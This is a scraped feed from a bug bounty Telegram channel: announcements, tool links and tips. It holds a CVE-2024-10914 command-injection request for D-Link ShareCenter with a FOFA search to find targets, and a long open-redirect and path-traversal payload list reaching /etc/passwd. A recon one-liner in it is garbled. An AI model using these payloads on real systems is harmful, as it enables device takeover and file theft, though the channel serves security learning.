Bug Bounty
10.4K subscribers
369 photos
3 videos
46 files
426 links
Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •
Download Telegram
🚀 Exciting News! 🚀

We're launching our Internship Program soon, and we'd love to hear from you!

What are your expectations for this opportunity? 🤔
Drop your thoughts below! ⬇️

@anukulhexx
🥰13👍53🔥3
🌟 Take a Break from Bug Bounty – Give Back with Divriti Foundation! 🌟

Hey, bug bounty hunters! I know we're all deeply involved in finding vulnerabilities, but sometimes it’s good to step back and make a positive impact in other ways. If you’ve got a little time to spare, come join me with Divriti Foundation and let’s give back to the community and the environment!

Divriti, based in Delhi, India, is leading initiatives in:

🌱 Environmental Conservation: Tree planting and sustainability efforts.
📚 Education: Supporting underprivileged students.
🐾 Animal Welfare: Caring for street animals.
and more..

And here’s a bonus: by volunteering, you’ll also have more chances to connect with me personally. I’d be happy to share bug bounty tips, guidance, and insights when we work together on initiatives. So if you’re interested in both community work and learning opportunities, this is the perfect chance!

WhatsApp Group Link to Join

💚 Let’s make time for nature and community. Together, we can make a real difference!
4👍2😍2
🐞 I’ve noticed a lot of beginners in bug bounty and pentesting feel pretty lost. Many are overwhelmed or unsure where to begin, so I put together some tips on common mistakes.

Read through these and see if you’re missing anything!
https://vulncure.com/PDF/Guide__Common_Mistakes_by_Bug_Hunters_.pdf

#bugbounty #infosec
🥰22👍155👏2🔥1🙏1🤡1
Hey everyone! 🌟 Hope you’re all doing well in your current phase. I’m looking for a skilled React Native developer to join us and help mitigate some ongoing challenges. If you’re interested or know someone who might be a great fit, please reach out to me at @rootxabhishek. Thanks!
👍4
cve-2024-10914

GET

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27

FOFA:app =D_Link-DNS-ShareCenter

#exploit #poc #IoT
👍108🥴5🥱3😐3
⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

🔗github.com/s0md3v/uro
😍6🔥4
☄️You can try this effective manual openredirect Bypass☄️

1. Null-byte injection:
   - /
google.com%00/
   - //
google.com%00
 
2. Base64 encoding variations:
   - aHR0cDovL2dvb2dsZS5jb20=
   - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   - //base64:d3d3Lmdvb2dsZS5jb20=/
 
3. Case-sensitive variations:
   - //
GOOGLE.com/
   - //
GoOgLe.com/

4. Overlong UTF-8 sequences:
   - %C0%AE%C0%AE%2F (overlong encoding for ../)
   - %C0%AF%C0%AF%2F%
2Fgoogle.com

5. Mixed encoding schemes:
   - /%68%74%74%70://
google.com
   - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   - //base64:%2F%
2Fgoogle.com/

6. Alternative domain notations:
   - //
google.com@127.0.0.1/
   - //
127.0.0.1.xip.io/
   - //0x7F000001/ (hexadecimal IP)

7. Trailing special characters:
   - //
google.com/#/
   - //
google.com/;&/
   - //
google.com/?id=123&//

8. Octal IP address format:
   - http://0177.0.0.1/
   - http://00177.0000.0000.0001/

9. IP address variants:
   - http://3232235777 (decimal notation of an IP)
   - http://0xC0A80001 (hex notation of IP)
   -
http://192.168.1.1/

10. Path traversal with encoding:
    - /..%252f..%252f..%252fetc/passwd
    - /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    - /..%5c..%5c..%5cwindows/system32/cmd.exe

11. Alternate protocol inclusion:
    -
ftp://google.com/
    - javascript:alert(1)//
google.com

12. Protocol-relative URLs:
    - :////
google.com/
    - :///
google.com/

13. Redirection edge cases:
    - //
google.com/?q=//bing.com/
    - //
google.com?q=https://another-site.com/

14. IPv6 notation:
    - http://[::1]/
    - http://[::ffff:
192.168.1.1]/
   
15. Double URL encoding:
    - %252f%
252fgoogle.com (encoded twice)
    - %
255cgoogle.com

16. Combined traversal & encoding:
    - /%2E%2E/%2E%2E/etc/passwd
    - /%2e%2e%5c%2e%2e/etc/passwd

17. Reverse DNS-based:
    -
https://google.com.reverselookup.com
    - //
lookup-reversed.google.com/

18. Non-standard ports:
    -
http://google.com:81/
    -
https://google.com:444/

19. Unicode obfuscation in paths:
    - /%E2%80%
8Egoogle.com/
    - /%C2%
A0google.com/

20. Query parameters obfuscation:
    - //
google.com/?q=http://another-site.com/
    - //
google.com/?redirect=https://google.com/

21. Using @ symbol for userinfo:
    -
https://admin:password@google.com/
    - http://
@google.com

22. Combination of userinfo and traversal:
    -
https://admin:password@google.com/../../etc/passwd
🔥10👍73👏2
🔖AWS penetration testing: A step-by-step Guide for Beginners

☄️https://www.hackthebox.com/blog/aws-pentesting-guide
7🥰4👏43
🔖Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities

https://github.com/rootDR/ex-param
🔥14👍2🥱1
This media is not supported in your browser
VIEW IN TELEGRAM
🔍 gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches.

🔗https://github.com/gwen001/gitlab-subdomains
👏8👍31
Extract all endpoints from a JS File and take your bug 🐞

Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt


#infosec #cybersec #bugbountytips
👍19🥰32
⚡️Want to download 100+ Bug Bounty Tips collected from X?

Download the PDF from here

#BugBounty #bugbountytips
5👍3🔥1
🔖 Dnsbruter - A powerful tool for active subdomain enumeration and discovery.

Features:
Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance.

🔗 https://github.com/RevoltSecurities/Dnsbruter/
11👍5
🔖The ultimate 403 Bypass wordlists and tester notes by JHaddix

📱 Github: 🔗 Link
🥰7👏1
🚀 Exciting News for #InfoSec & #BugBounty! 🛡

ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥

Proxy management
Scope validation
Program tracking
Lightweight & private

Open-Source : https://github.com/aacle/ProxSec

Feedback welcome! 💬
11🥰4